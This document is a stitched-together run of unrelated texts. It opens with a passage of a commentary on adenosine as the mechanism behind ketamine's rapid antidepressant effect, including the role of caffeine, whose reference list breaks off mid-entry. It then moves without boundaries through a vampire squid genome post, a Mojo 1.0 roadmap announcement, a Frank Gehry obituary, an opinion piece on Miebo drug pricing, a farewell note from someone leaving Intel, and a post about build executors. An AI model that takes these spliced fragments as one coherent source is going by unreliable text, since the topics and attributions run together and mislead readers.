This metabolic brake cascades into adenosine production. Using PercevalHR sensors to measure intracellular ATP/ADP ratios in vivo, they show that ketamine quickly decreases this ratio in CaMKII⁺ pyramidal neurons (largest effect), GABAergic interneurons (transient reduction with rebound), and astrocytes (sustained decrease) (
2
). The timing is telling: the ATP/ADP ratio decrease comes before the extracellular adenosine surge, making metabolic perturbation upstream.
Critically, this occurs without neuronal hyperactivity. By analyzing calcium signaling response in pyramidal and GABAergic neurons to therapeutic doses of ketamine using GCaMP8s, it was found that ketamine at 10 mg/kg did not increase Ca²⁺ signaling in pyramidal neurons and actually decreased activity of GABAergic interneurons (
2
). This overturns the assumption that seizure-like neuronal hyperactivity is necessary for rapid antidepressant action. The mechanism is metabolic modulation driving adenosine efflux via equilibrative nucleoside transporters, not excitotoxic processes.
The authors demonstrate that dipyridamole, an ENT1/2 inhibitor, reduces the adenosine signal induced by ketamine, confirming the role of these transporters (
2
). In contrast, genetic depletion of CD73 (which hydrolyzes extracellular ATP to adenosine) has no effect on ketamine-induced adenosine surges.¹ The adenosine arises intracellularly and exits through ENT1/2 transporters in response to the concentration gradient produced by metabolic shifts.
From mechanism to molecules
This work goes beyond descriptive neuroscience in its immediate therapeutic translation. Adenosine dynamics appear to act as a functional biomarker in their hands. Based on this observation, the authors synthesized 31 ketamine derivatives by inducing systematic changes in chemical groups affecting their metabolism and receptor binding (
2
). Screening identified deschloroketamine (DCK) and deschloro-N-ethyl-ketamine (2C-DCK) as compounds showing 40-80% stronger adenosine signals than ketamine at equivalent doses.
The effects of this drug on behavior were noticed immediately. DCK produced significant antidepressant effects at 2 mg/kg (compared to 10 mg/kg for ketamine) with only a little hyperlocomotion at this dose (
2
). This shows a dissociation between therapeutic and psychomimetic effects. In particular, DCK at therapeutic doses showed only a small amount of locomotor activation. On the other hand, ketamine at 10 mg/kg produced significant hyperlocomotion. The enhanced therapeutic index indicates that promoting signaling downstream of adenosine rather than optimizing NMDA receptor nonspecific blockade broadens the safe window.
The authors provide clear evidence for the dissociation between NMDAR antagonism and the release of adenosine. Studies showed that compounds such as 3'-Cl-ketamine blocked NMDARs with high potency (IC₅₀ comparable to ketamine in cortical slice recordings) but did not induce adenosine surges and are ineffective as an antidepressant (
2
). The correlation between the estimated in vivo NMDAR inhibitions (derived from the ex vivo IC
50
values and brain tissue concentrations) and adenosine modulation was non-significant (Pearson r, P = 0.097).¹ Therefore, NMDAR antagonism is neither necessary nor sufficient; the therapeutic action operates via ketamine's direct mitochondrial actions.
This metabolic evidence is consistent with the parent compound driving adenosine release. In contrast, ketamine's primary metabolites—norketamine and (2R,6R)-hydroxynorketamine—do not produce adenosine responses at equivalent doses (
2
). Notably, hydroxynorketamine does have antidepressant properties in some studies (
8
). Inhibition of metabolism is important: CYP3A4 inhibitors (ketoconazole, ritonavir) potentiated the adenosine signal, whilst CYP2B6 inhibition (ticlopidine) did not (
2
).
Electroconvulsive therapy and beyond
The adenosine framework extends beyond ketamine. Seizures induced by electroconvulsive therapy (ECT) in anesthetized mice (40 mA, 100 Hz, 10s) mediated an adenosine surge in medial prefrontal cortex (mPFC) comparable in magnitude to that of ketamine but with faster kinetics (
2
). That is, the onset and decay of adenosine signaling are faster, consistent with the idea that ECT produces intense but brief neuronal firing. According to the authors, the requirement for adenosine to mediate these antidepressant effects is also the same. Adora1
−/−
mice (lacking the adenosine receptor A1) and Adora2a
−/−
mice (lacking the adenosine receptor A2A) did not respond to ECT with reductions in immobility in forced swim test or restored preference for sucrose in sucrose preference test (
2
).
The researchers found that acute intermittent hypoxia (aIH), which is a controlled reduction in oxygen that consists of 5 cycles of 9% O₂ for a duration of 5 min, interspersed with 21% O₂, when done daily for 3 days produces antidepressant effects that were entirely reliant on adenosine signaling.¹ Most importantly, from a clinical perspective, aIH is non-invasive, has been shown to be safe in other clinical contexts (
9
), does not require any complex machinery as long as oxygen can be controlled, and could be rolled out in low-resourced settings. Adenosine receptor knockout mice had no antidepressant effects from aIH, which indicates that aIH, ketamine, and ECT share identical mechanistic dependence on adenosine signaling (
Figure 1
) (
2
).
The coffee question: Clinical and mechanistic insights
It is certainly a paradoxical sort of story worth noticing. The most commonly consumed psychoactive drug in the world is caffeine, which functions as an adenosine receptor antagonist (
Figure 2
). The study makes it clear that “the possibility of dietary caffeine interfering with these treatments (
2
,
10
,
11
).” The warning has mechanistic grounding: if activation of adenosine receptors is necessary for therapeutic effectiveness, and caffeine is an adenosine receptor antagonist, then coffee drinking can be expected to blunt treatment response.
Figure 2.
The coffee paradox in adenosine-mediated antidepressant action. Depression (left) and coffee consumption (right) are both linked through adenosine signaling (center), creating a pharmacological paradox: chronic coffee drinking appears protective against depression through tonic adenosine receptor modulation, while acute pre-treatment caffeine may attenuate the phasic adenosine surge required for rapid antidepressant responses to ketamine and electroconvulsive therapy.
The epidemiological literature paints a different picture. The findings of a number of meta-analyses indicate that chronic coffee consumption protects against depression. One meta-analysis found that RR coffee 0.757, RR caffeine 0.721 (
12
). Another one found RR 0.76, with an optimal protective effect at ∼400 mL/day (
13
). In comparison to many drug treatments that have an effect size in this range, this is not a small effect size. A risk reduction of 20 to 25% is quite impressive.
Ideas based on known pharmacology, but not yet directly
One might find answers in the tonic and phasic adenosine signaling and if there is any receptor reserve. Ongoing caffeine use will cause a modest (∼20%) upregulation of A1 receptors, but crucially, this upregulation does not interfere with any functional signaling capacity of the receptor upon binding of adenosine (
14
). The receptors are still functional; there are just more of them.
Furthermore, adenosine receptors show a significant “spare receptor” reserve, with A2A receptor reserve estimated to be 70–90% and 10–64% for A1 receptors. It means a 5–10% occupancy of the receptor can give rise to approximately a 50% maximal effect (
15
,
16
). An antagonist must occupy more than 95% of the receptors to block any effect when spare receptors are present (
15
).
The pharmacokinetics of caffeine is relevant here. Caffeine has a half-life of 3–7 hours and a peak concentration 45–60 minutes after ingestion, with a receptor occupancy of ∼50%–65% between doses in regular consumers (
11
,
17
).
When there is chronic consumption, there is usually a tonic effect which results in more receptors being upregulated in addition to a maintained spare receptor reserve. While there is partial occupancy on the receptors, there is no complete occupancy. The fundamental adenosinergic tone might be augmented in the presence of the antagonist consistent with epidemiological protection from depression.
Prior consumption of caffeine (phasic blockade) must be overcome by the adenosine surge following ketamine or ECT application. When caffeine occupies 50–65% of receptors, there's still considerable receptor reserve available. This means the adenosine surge has to work harder to overcome the blockade, weakening the signal without wiping it out completely. With considerable but not infinite receptor reserve, adenosine signal decreases but does not get obliterated.
More tailored approaches instead of outright bans are suggested by this pharmacologcial analysis.
Regular caffeine/coffee use pre-ketamine is probably not contraindicated. Epidemiological data suggest a possible benefit of that use.
Having coffee just before the treatment is more concerning. Patients may be recommended caffeine washout to achieve optimal adenosine receptor availability during the critical adenosine spike.
Drinking coffee after treatment is probably safe once the first plasticity mechanisms are already established.
Can we test whether regular coffee drinkers show blunted ketamine responses? Does controlled caffeine washout enhance outcomes? Is there a link between caffeine use and the response? The current paper offers the mechanistic foundation to pose such questions rigorously.
But these things are still open empirical questions, sadly. This system has not yet undergone quantitative pharmacology that links chronic receptor modulation with acute receptor reserve and surge amplitudes large enough to overcome partial blockade. Yue et al. clarify mechanisms to ensure that scientists pose the right questions.
What remains unknown
What makes this piece valuable is its honesty about the boundaries of its work. Several questions merit attention.
The mechanisms linking acute adenosine surges to sustained plasticity are not well defined. The authors demonstrate that the upregulation of BDNF [a key transducer of antidepressant effects (
18
)] produced by ketamine requires the A1 and A2A receptors (
2
), linking adenosine to established pathways of neuroplasticity. Still, more elaboration is needed on how a surge of adenosine for ∼30 minutes produces antidepressant effects extending over days-to-weeks. HOMER1A activation and stimulation of the mTOR pathway are cited in the paper as likely downstream effectors (
2
,
19
,
20
) but the full signalling pathway has yet to be defined.
Second, the hippocampal story is incomplete. After ketamine, adenosine levels soared in the hippocampus in a manner comparable to that in the mPFC (
2
). It should be noted that optogenetic initiation of adenosine and the direct infusion of adenosine into the dorsal hippocampus did not produce an antidepressant effect (
2
). This suggests functional heterogeneity, possibly along the dorsal–ventral axis. With the ventral hippocampus having greater associations with mood circuits and the dorsal hippocampus serving cognitive and spatial functions. The authors rightly highlight the need for an investigation of this complex matter.
We will need to incorporate these into our understanding of the relationship between adenosine and the other proposed ketamine mechanisms. In this area, there has been interest in NMDAR antagonism (
21
), AMPA receptor potentiation (
22
), mTOR activation (
23
) and various metabolite effects (
8
). The current work shows that adenosine is necessary and sufficient and that the NMDAR block dissociates from therapeutic action across derivatives. lthough the position of adenosine in the signaling cascade remains unclear, whether it operates in parallel with, upstream of, or downstream from other mechanisms, the authors' data suggest that adenosine may be the primary initiating signal and that other mechanisms are downstream consequences but this is yet to be validated.
To apply this finding to treatment resistant depression in humans, we have to keep in mind the heterogeneity that clinical psychiatry so well knows. Some patients do not respond to ketamine and not all respond to ECT. Do nonresponders have defects in how they produce adenosine, express receptors, or couple receptor signaling? Can adenosine dynamics—appraised with PET tracers for A1 and A2A receptors and, if predictive, using peripheral biomarkers—sample patients likely to respond? These questions ultimately determine clinical utility.
A framework for rational development
Unfortunately, psychiatry has depended much more on serendipity than mechanism for a long time. The monoamine hypothesis was discovered accidentally (as with iproniazid and imipramine). The atypical antipsychotics resulted from chemical modifications aimed at fewer side effects. Finally, the discovery of ketamine's antidepressant properties occurred by accident during studies of its properties. We have been, in Baudrillard's concept, cartographers mapping territories we have not yet crossed: “The territory no longer precedes the map, nor survives it. Henceforth, it is the map that precedes the territory (
24
).” We say we know what works without knowing why.
In contrast, Yue et al. provide an extraodinary map after exquisitely researching the territory. With adenosine as the mechanistic target, the authors have already demonstrated proof-of-principle: derivatives with enhanced adenosine signaling show improved therapeutic indices.¹ The path forward involves:
Medicinal chemistry optimization
of adenosine-enhancing compounds, prioritizing metabolic mitochondrial modulators over NMDAR antagonists.
Allosteric modulation
of A1 and A2A receptors to enhance endogenous signaling without tonic activation.
Non-pharmacological interventions
(aIH, potentially others) that leverage adenosine biology.
Biomarker development
for patient stratification and response prediction.
Combination strategies
targeting complementary nodes in the adenosine-plasticity cascade.
The technical platform is robust: genetically encoded sensors provide real-time functional readouts for compound screening; the behavioral assays are well-validated; the genetic models allow mechanistic dissection; the therapeutic endpoints (onset, duration, side effects) are clinically meaningful.
Most critical is that the work establishes that rapid antidepressant action is not a pharmacological curiosity of a dissociative anesthetic. A reproducible neurobiological phenomenon, adenosine-driven plasticity in mood-regulatory circuits, can be triggered by multiple routes. This converts an empirical observation (ketamine works fast) into a biological principle (adenosine surges trigger antidepressant plasticity) that guides rational therapeutic development (
Table 1
).
Table 1.
Clinical Implications of Adenosine-Based Antidepressant Mechanisms
As we have previously written about the psychotherapeutics, it is only time that will tell how far our conceptions of causation are from physical reality. Yue et al. have greatly shortened that distance. The overarching mechanism or platform refers to elements including genetically encoded sensors, validated targets, proof-of-principle molecules, non-drug alternatives and the general model explaining disparate interventions.
The adenosine hypothesis can be tested with readily available tools and immediate therapeutic implications. Yue et al. have given the field the aerial view after decades wandering through the forest of empirical psychopharmacology and not looking beyond the next tree.
Perhaps the most intriguing implication of this work lies in an unexpected connection: the most rigorous mechanistic dissection of rapid antidepressant action identifies adenosine as the critical mediator, yet adenosine receptors are the primary target of caffeine, the world's most widely consumed psychoactive substance. Is this merely coincidence, or does it reveal something fundamental about why humans have gravitated toward caffeine consumption across cultures and millennia? The epidemiological protection that chronic coffee drinking confers against depression may represent an inadvertent form of adenosinergic modulation operating at population scale. Yet the same mechanism that provides tonic benefit might interfere with phasic therapeutic surges during acute treatment.
The coffee paradox demands resolution through carefully designed clinical studies. Do regular coffee drinkers show altered responses to ketamine or electroconvulsive therapy? Does pre-treatment caffeine washout enhance therapeutic outcomes? Can we develop dosing strategies that preserve the protective effects of chronic consumption while optimizing acute treatment responses? The convergence of the world's most prevalent psychoactive drug with the mechanistic lynchpin of our most effective rapid antidepressants is unlikely to be accidental. Understanding this intersection may illuminate both the widespread appeal of caffeine and the optimization of adenosine-targeted therapeutics. The next generation of clinical trials should systematically examine caffeine consumption patterns as a critical variable in treatment response, transforming an apparent pharmacological complication into a therapeutic opportunity.
Author contributions
Both authors contributed equally and fully to this article.
Funding sources
The authors are supported by funding from the NIH/National Institute of Mental Health (R0MH127423).
Author disclosures
The authors declare no conflict of interests.
References
1.
Bernard
C
.
An introduction to the study of experimental medicine
.
.
The physiological effects of caffeine on synaptic transmission and plasticity in the mouse hippocampus selectively depend on adenosine A
1
and A
2A
receptors
.
Biochem Pharmacol
.
2019
;
166
:
313
–
21
. DOI:
10.1016/j.bcp.2019.06.008
. PMID:
31199895
.
Coffee, tea, caffeine and risk of depression: A systematic review and dose-response meta-analysis of observational studies
.
Mol Nutr Food Res
.
2016
;
60
(
The vampire squid (Vampyroteuthis infernalis) has the largest cephalopod genome ever sequenced: more than 11 billion base pairs. That’s more than twice as large as the biggest squid genomes.
It’s technically not a squid: “The vampire squid is a fascinating twig tenaciously hanging ...
The vampire squid (
Vampyroteuthis infernalis
) has the
largest cephalopod genome
ever sequenced: more than 11 billion base pairs. That’s more than twice as large as the biggest squid genomes.
It’s technically not a squid: “The vampire squid is a fascinating twig tenaciously hanging onto the cephalopod family tree. It’s neither a squid nor an octopus (nor a vampire), but rather the last, lone remnant of an ancient lineage whose other members have long since vanished.”
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Our vision for Mojo is to be the one programming language developers need to target diverse hardware—CPUs, GPUs, and other accelerators—using Python's intuitive syntax combined with modern systems programming capabilities.
While we want Mojo to achieve its full roadmap potential over time, we also want to bring an epoch of stability to the Mojo development experience, and thus a 1.0 version. As such,
Mojo will reach 1.0 once we complete the
goals we’ve listed for Phase 1 in our roadmap
, providing stability for developers seeking a high-performance CPU and GPU programming language.
Work is well underway for the remaining features and quality work we need to complete for this phase, and we feel confident that Mojo will get to 1.0 sometime in 2026. This will also allow us to
open source the Mojo compiler
as promised
.
While we are excited about this milestone, this of course won’t be the end of Mojo development! Some commonly requested capabilities for more general systems programming won’t be completed for 1.0, such as a robust async programming model and support for private members. Read below for more information on that!
Why a 1.0 now?
A 1.0 version for Mojo makes sense now for several reasons: first, we’d like to establish an epoch of stability within the Mojo ecosystem. A vibrant and growing community has formed around Mojo, and more people are looking to build larger projects using it. To date, the rapid pace of change in Mojo and its libraries has been a challenge.
We want to make it much easier to maintain a Mojo project by giving developers the confidence that what they write today won’t break tomorrow. The introduction of semantic versioning, markers for stable and unstable interfaces, and an overall intentionality in language changes will provide an even more solid foundation for someone developing against Mojo 1.x.
Mojo packages that use stabilized APIs should keep building across the 1.x series, even as we continue to add in new features that don’t make 1.0 itself. This will let the growing number of community Mojo libraries interoperate, unlocking increasingly complex Mojo projects.
We’re excited to have more Mojicians come to the platform. Announcing a 1.0 for the language will be a sign to the rest of the world to come and try out Mojo, or to come back and see how it has grown since the last time they kicked the tires. That’s why it’s important to us to have an excellent documentation and tooling experience for new and returning developers.
Planning for Mojo 1.0 has also been hugely valuable to the Modular team, as it provides a forcing function for focus and prioritization. There’s so much that can be worked on when developing a language that it’s helpful to identify what we
weren’t
going to be able to do before 1.0. That lets us direct effort to making a more solid experience for what Mojo is great at today, and polish an initial set of features before adding more.
Regarding the Mojo standard library, we’ve planned to give sufficient time to run each new language feature through it. This lets us identify bugs or areas of improvement before we call a feature “done”. We also expect 1.0 to have relatively few library features “stabilized” and expand that scope over time incrementally.
What’s next after 1.0?
Mojo 1.0 will be a milestone to celebrate, but it is only a step in a much longer journey. There are many features that won’t quite make the 1.0 launch, some of which we plan to roll out incrementally in 1.x releases. Many of these features (e.g. a “match” statement and enums) will be backward compatible and won’t break existing code, so we can add them into 1.x releases.
That said, we know that Mojo 1.0 won’t be perfect! There are some important language features in Phase 2 of the Mojo language roadmap that will introduce breaking changes to the language and standard library. For example, the ability to mark fields “private” is essential to providing memory safety.
During the development of Mojo 1.x, we will announce plans for a source breaking Mojo 2.0, and will build support for it under an “experimental” flag to allow opt-in support to this language mode. This means the Mojo compiler will support both 1.x and 2.0 packages, and we aim to make them link compatible - just like C++’20 is source incompatible with C++’98, but developers can build hybrid ecosystems. We will then enable package-by-package migration from 1.x to 2.x over time when 2.0 converges and ships.
Right now we are laser-focused on getting 1.0 out the door, but we have great confidence we’ll be able to navigate this future transition smoothly. Mojo learns a lot great things from Python, as well as from things that didn’t go as well: we’ll do what we can to avoid a transition like Python 2 to 3!
Join the community and follow along!
Our work towards Mojo 1.0 will be done in the open, and we welcome feedback and pull requests that help make the language even better. There are some great ways to participate:
Check out the new language and library additions as they roll out on a nightly basis in our open-source
modular
repository.
Have detailed discussions about language and interface design in
the Modular forum
.
Frank Gehry, one of the most influential architects of the last century, has died aged 96.
Gehry was acclaimed for his avant garde, experimental style of architecture. His titanium-covered design of the Guggenheim Museum in Bilbao, Spain, catapulted him to fame in 1997.
He built his daring reputation years before that when he redesigned his own home in Santa Monica, California, using materials like chain-link fencing, plywood and corrugated steel.
HIs death was confirmed by his chief of staff Meaghan Lloyd. He is survived by two daughters from his first marriage, Leslie and Brina; his wife, Berta Isabel Aguilera, and their two sons, Alejandro and Samuel,
Born in Toronto in 1929, Gehry moved to Los Angeles as a teenager to study architecture at the University of Southern California before completing further study at the Harvard Graduate School of Design in 1956 and 1957.
After starting his own firm, he broke from the traditional architectural principles of symmetry, using unconventional geometric
shapes and unfinished
materials in a style now known as deconstructivism.
"I was rebelling against everything," Gehry said in an interview with The New York Times in 2012.
His work in Bilbao put him in high demand, and he went on to design iconic structures in cities all over the world: the Jay Pritzker Pavilion in Chicago's Millennium Park, the Gehry Tower in Germany, and the Louis Vuitton Foundation in Paris.
"He bestowed upon Paris and upon France his greatest masterpiece," said Bernard Arnault, the CEO of LVMH, the worlds largest luxury goods company which owns Louis Vuitton.
With a largely unpredictable style, no two of his works look the same. Prague's Dancing House, finished in 1996, looks like a glass building folding in on itself; his Hotel Marques in Spain, built in 2006, features thin sheets of wavy, multicoloured metal; his design for a business school in Sydney looks like a
brown paper bag
.
Gehry won the coveted Pritzker Architecture Prize for lifetime achievement in 1989, when he was 60, with his work described as having a "highly refined, sophisticated and adventurous aesthetic".
"His designs, if compared to American music, could best be likened to Jazz, replete with improvisation and a lively unpredictable spirit," ther Pritzker jury said at the time.
Gehry was awarded the Order of Canada in 2002 and the Presidential Medal of Freedom, the highest civilian honour in the US, in 2016.
A $20 drug in Europe requires a prescription and $800 in the U.S.
A month’s supply of Miebo, Bausch & Lomb’s prescription dry eye drug, costs $800 or more in the U.S. before insurance. But the same drug — sold as
EvoTears
— has been available over-the-counter (OTC) in Europe since 2015 for about $20. I ordered it online from an overseas pharmacy for $32 including shipping, and it was delivered in a week.
This is, of course, both shocking and unsurprising. A 2021 RAND
study
found U.S. prescription drug prices are, on average, more than 2.5 times higher than in 32 other developed nations. Miebo exemplifies how some pharmaceutical companies exploit regulatory loopholes and patent protections, prioritizing profits over patients, eroding trust in health care. But there is a way to fix this loophole.
In December 2019, Bausch & Lomb, formerly a division of Valeant, acquired the exclusive license for the commercialization and development in the United States and Canada for NOV03, now called Miebo in the U.S. Rather than getting an approval for an OTC drug, like it is in Europe, Bausch secured U.S. Food and Drug Administration approval as a prescription medication, subsequently pricing it at a high level. Currently, according to GoodRx, a monthly supply of Miebo will cost $830.27 at Walgreens, and it’s listed at $818.38 on
Amazon Pharmacy
.
The strategy has paid off: Miebo’s 2024 sales — its first full year — hit
$172 million
, surpassing the company’s projections of $95 million. The company now forecasts sales to exceed
$500 million annually
. At European prices, those sales would be less than $20 million. Emboldened with Miebo’s early success, Bausch & Lomb raised the price another 4% in 2025, according to the drug price tracking firm 46brooklyn.
Bausch & Lomb has a track record of prioritizing profits over patients. As Valeant, its business model was simple: buy, gut, gouge, repeat. In 2015, it raised prices for Nitropress and Isuprel by over
200% and 500%
, respectively, triggering a 2016 congressional hearing. Despite promises of reform, little has changed. When he was at Allergan, Bausch & Lomb’s current CEO, Brent Saunders, pledged “
responsible pricing
” but tried to extend patent protection for Allergan’s drug Restasis (another dry eye drug) through a
dubious deal with the Mohawk Indian tribe
, later rejected by courts.
Now at Bausch & Lomb, Saunders oversaw Miebo’s launch, claiming earlier this year in an investor call, “We are once again an innovation company.” But finding a way to get an existing European OTC drug to be a prescription drug in the U.S. with a new name and a 40-fold price increase is not true innovation — it’s a price-gouging strategy.
Bausch & Lomb could have pursued OTC approval in the U.S., leveraging its expertise in OTC eye drops and lotions. However, I could not find in transcripts or presentations any evidence that Baush & Lomb seriously pursued this. Prescription status, however, ensures much higher prices, protected by patents and limited competition. Even insured patients feel the ripple effects: Coupons may reduce out-of-pocket costs, but insurers pay hundreds per prescription, driving up premiums and the overall cost of health care for everyone.
In response to questions from STAT about why Miebo is an expensive prescription drug, a representative said in a statement, “The FDA determined that MIEBO acts at the cellular and molecular level of the eye, which meant it had to go through the same rigorous process as any new pharmaceutical — a full New Drug Application. Unlike in Europe, where all medical device eye drops are prescription-free and cleared through a highly predictable and fast pathway, we were required to design, enroll and complete extensive clinical trials involving thousands of patients, and provide detailed safety and efficacy data submissions. Those studies took years and significant investment, but they ensure that MIEBO meets the highest regulatory standards for safety and effectiveness.”
Bausch & Lomb’s carefully worded response expertly sidesteps the real issue. The FDA’s test for OTC status isn’t a drug’s mechanism of action — it’s whether patients can use it safely without a doctor. Miebo’s track record as an OTC product in Europe for nearly a decade shows it meets that standard. Bausch & Lomb provides no evidence, or even assertion, that it ever tried for OTC approval in the U.S. Instead, it pursued the prescription route — not because of regulatory necessity, but as a business strategy to secure patents and command an $800 price. In doing so, B&L is weaponizing a regulatory loophole against American patients, prioritizing profit over access, and leaving their “significant investment” as the cost of monopoly, not medical necessity.
Even if you accept Bausch & Lomb’s self-serving rationale, the answer is not to allow the loophole to persist, but to close it. The FDA could require any drug approved as OTC internationally be considered for OTC status in the United States before greenlighting it as a prescription product — and mandate retroactive review of cases like Miebo.
The FDA’s OTC monograph process, which assesses the safety and efficacy of nonprescription drugs, makes this feasible, though it may need to be adjusted slightly. Those changes might involve incorporating a mechanism to make sure that overseas OTC status triggers a review of U.S. prescription drugs containing the same active ingredients or formulations for potential OTC designation; developing criteria to assess equivalency in safety and efficacy standards between U.S. OTC requirements and those of other countries; and establishing a retroactive review pathway within the monograph process to handle existing prescription drugs already marketed OTC internationally.
EvoTears thrives abroad without safety concerns, countering industry claims of stricter U.S. standards. This reform would deter companies from repackaging OTC drugs as high-cost prescriptions, fostering competition and lowering prices.
While this tactic isn’t widespread, it joins loopholes like late-listed patents, picket fence patents, or pay-for-delay generic deals that undermine trust in an industry whose employees largely aim to save lives.
Miebo also shows how global reference pricing could save billions. Aligning with European prices could cut consumer costs while reducing doctor visits, pharmacy time, and administrative burdens. For patients who skip doses to afford groceries, lower prices would mean better access and health. Reforms like the 2022 Inflation Reduction Act’s Medicare price negotiations set a precedent, but targeted rules are urgently needed.
Unexplained differences in drug prices between the U.S. and other wealthy countries erode the public’s trust in health care. Companies like Bausch & Lomb exploit systemic gaps, leaving patients and payers to foot exorbitant bills. An OTC evaluation rule, with retroactive reviews, is a practical first step, signaling that patient access takes precedence over corporate greed.
Let’s end the price-gouging practices of outliers and build a health care system that puts patients first. Just as targeting criminal outliers fosters a law-abiding society, holding bad pharmaceutical actors accountable is crucial for restoring trust and integrity to our health care system. While broader approaches to making health care more fair, accessible, and affordable are needed, sometimes the way to save billions is to start by saving hundreds of millions.
David Maris is a six-time No. 1 ranked pharmaceutical analyst with more than two decades covering the industry. He currently runs
Phalanx Investment Partners
, a family office; is a partner in
Wall Street Beats
; and is co-author of the recently published book “
The Fax Club Experiment
.” He is currently working on his next book about
health care in America.
I've resigned from Intel and accepted a new opportunity. If you are an Intel employee, you might have seen my fairly long email that summarized what I did in my 3.5 years. Much of this is public:
It's still early days for AI flame graphs. Right now when I browse CPU performance case studies on the Internet, I'll often see a CPU flame graph as part of the analysis. We're a long way from that kind of adoption for GPUs (and it doesn't help that our open source version is Intel only), but I think as GPU code becomes more complex, with more layers, the need for AI flame graphs will keep increasing.
I also supported cloud computing, participating in 110 customer meetings, and created a company-wide strategy to win back the cloud with 33 specific recommendations, in collaboration with others across 6 organizations. It is some of my best work and features a visual map of interactions between all 19 relevant teams, described by Intel long-timers as the first time they have ever seen such a cross-company map. (This strategy, summarized in a slide deck, is internal only.)
I always wish I did more, in any job, but I'm glad to have contributed this much especially given the context: I overlapped with Intel's toughest 3 years in history, and I had a hiring freeze for my first 15 months.
My fond memories from Intel include
meeting
Linus
at an Intel event who said "everyone is using
fleme
graphs these days" (Finnish accent),
meeting Pat Gelsinger who knew about my work and introduced me to everyone at an exec all hands,
surfing lessons at an Intel Australia and HP offsite (
mp4
),
and meeting
Harshad Sane
(Intel cloud support engineer) who helped me when I was at Netflix and now has joined Netflix himself -- we've swapped ends of the meeting table. I also enjoyed meeting Intel's hardware fellows and senior fellows who were happy to help me understand processor internals. (Unrelated to Intel, but if you're a Who fan like me, I recently met some other
people
as
well
!)
My next few years at Intel would have focused on execution of those 33 recommendations, which Intel can continue to do in my absence. Most of my recommendations aren't easy, however, and require accepting change, ELT/CEO approval, and multiple quarters of investment. I won't be there to push them, but other employees can (my CloudTeams strategy is in the inbox of various ELT, and in a shared folder with all my presentations, code, and weekly status reports). This work will hopefully live on and keep making Intel stronger. Good luck.
Assemblies: A Path to Co-Governance and Democratic Renewal
OrganizingUp
convergencemag.com
2025-12-05 20:24:21
Democracy should give us a real say in the decisions that shape our lives, but few people today feel the government is working for them. Inequality is extreme, our economic lives are precarious, and trust in government and all kinds of institutions is at historic lows. All this has opened up space f...
The market fit is interesting. Git has clearly won, it has all of the mindshare, but since you can use jj to work on Git repositories, it can be adopted incrementally. This is, in my opinion, the only viable way to introduce a new VCS: it has to be able to be partially adopted.
If you've worked with other determinism-based systems, one thing they have in common is they feel really fragile, and you have to be careful that you don't do something that breaks the determinism. But in our case, since we've created every level of the stack to support this, we can offload the determinism to the development environment and you can basically write whatever code you want without having to worry about whether it's going to break something.
Configuring the build based on the host environment and build targets. I am not aware of any common name for this, other than maybe
configure script
(but there exist many tools for this that are not just shell scripts). Common examples are CMake, Meson, autotools, and the Cargo CLI interface (e.g.
--feature
and
--target
).
Executing a bunch of processes and reporting on their progress. The tool that does this is called a
build executor
. Common examples are
make
,
ninja
,
docker build
, and the
Compiling
phase of
cargo build
.
There are a lot more things an executor can do than just spawning processes and showing a progress report!
This post explores what those are and sketches a design for a tool that could improve on current executors.
change detection
Ninja depends on
mtimes, which have many issues
. Ideally, it would take notes from
redo
and look at file attributes, not just the mtime, which eliminates many more false positives.
querying
I wrote earlier about
querying the build graph
.
There are two kinds of things you can query: The configuration graph (what bazel calls the
target graph
), which shows dependencies between "human meaningful" packages; and the
action graph
, which shows dependencies between files.
Queries on the action graph live in the executor; queries on the configuration graph live in the configure script. For example,
cargo metadata
/
cargo tree
,
bazel query
, and
cmake --graphiz
query the configuration graph;
ninja -t inputs
and
bazel aquery
query the action graph. Cargo has no stable way to query the action graph.
Note that “querying the graph” is not a binary yes/no. Ninja's query language is much more restricted than Bazel's. Compare Ninja's syntax for querying “the command line for all C++ files used to build the target
//:hello_world
”
2
:
Bazel’s language has graph operators, such as union, intersection, and filtering, that let you build up quite complex predicates. Ninja can only express one predicate at a time, with much more limited filtering—but unlike Bazel, allows you to filter to individual parts of the action, like the command line invocation, without needing a full protobuf parser or trying to do text post-processing.
I would like to see a query language that combines both these strengths: the same nested predicate structure of Bazel queries, but add a new
emit()
predicate that takes another predicate as an argument for complex output filtering:
In
my previous post
, I talked about two main uses for a tracing build system: first, to automatically add dependency edges for you; and second, to verify at runtime that no dependency edges are missing. This especially shines when the action graph has a way to express negative dependencies, because the tracing system
sees
every attempted file access and can add them to the graph automatically.
I would want my executor to only support linting and hard errors for missing edges. Inferring a full action graph is scary and IMO belongs in a higher-level tool, and adding dependency edges automatically can be done by a tool that wraps the executor and parses the lints.
What's really cool about this linting system is that it allows you to gradually transition to a hermetic build over time, without frontloading all the work to when you switch to the tool.
environment variables
Tracing environment variable access is … hard. Traditionally access goes through the libc
getenv
function, but it’s also possible to take an
envp
in a main function, in which case accesses are just memory reads. That means we need to trace memory reads somehow.
On x86 machines, there’s something called
PIN
that can do this directly in the CPU without needing compile time instrumentation. On ARM there’s
SPE
, which is how
perf mem
works, but I’m not sure whether it can be configured to track 100% of memory accesses. I need to do more research here.
On Linux, this is all abstracted by
perf_event_open
. I’m not sure if there’s equivalent wrappers on Windows and macOS.
One last way to do this is with a
SIGSEGV signal handler
, but that requires that environment variables are in their own page of memory and therefore a linker script. This doesn’t work for environment variables specifically, because they
aren’t linker symbols in the normal sense, they get injected by the C runtime
. In general, injecting linker scripts means we’re modifying the binaries being run and might cause unexpected build or runtime failures.
ronin
: a ninja successor
Here I describe more concretely the tool I want to build, which I’ve named
ronin
. It would read the
constrained clojure action graph serialization format
(Magma) that I describe in the previous post; perhaps with a way to automatically convert Ninja files to Magma.
interface
Like
Ekam
, Ronin would have a
--watch
continuous rebuild mode (but unlike Bazel and Buck2, no background server). Like Shake, It would have runtime tracing, with all of
--tracing=never|warn|error
options, to allow gradually transitioning to a hermetic build. And it would have bazel-like querying for the action graph, both through CLI arguments with an jq syntax and through a programmatic API.
Finally, it would have pluggable backends for file watching, tracing, stat-ing, progress reporting, and checksums, so that it can take advantage of systems that have more features while still being reasonably fast on systems that don’t. For example, on Windows stats are slow, so it would cache stat info; but on Linux stats are fast so it would just directly make a syscall.
architecture
Like Ninja, Ronin would keep a command log with a history of past versions of the action graph. It would reuse the
bipartite graph structure
, with one half being files and the other being commands. It would parse depfiles and dyndeps files just after they’re built, while the cache is still hot.
Like
n2
, ronin would use a single-pass approach to support early cutoff. It would hash an "input manifest" to decide whether to rebuild. Unlike
n2
, it would store a mapping from that hash back to the original manifest so you can query why a rebuild happened.
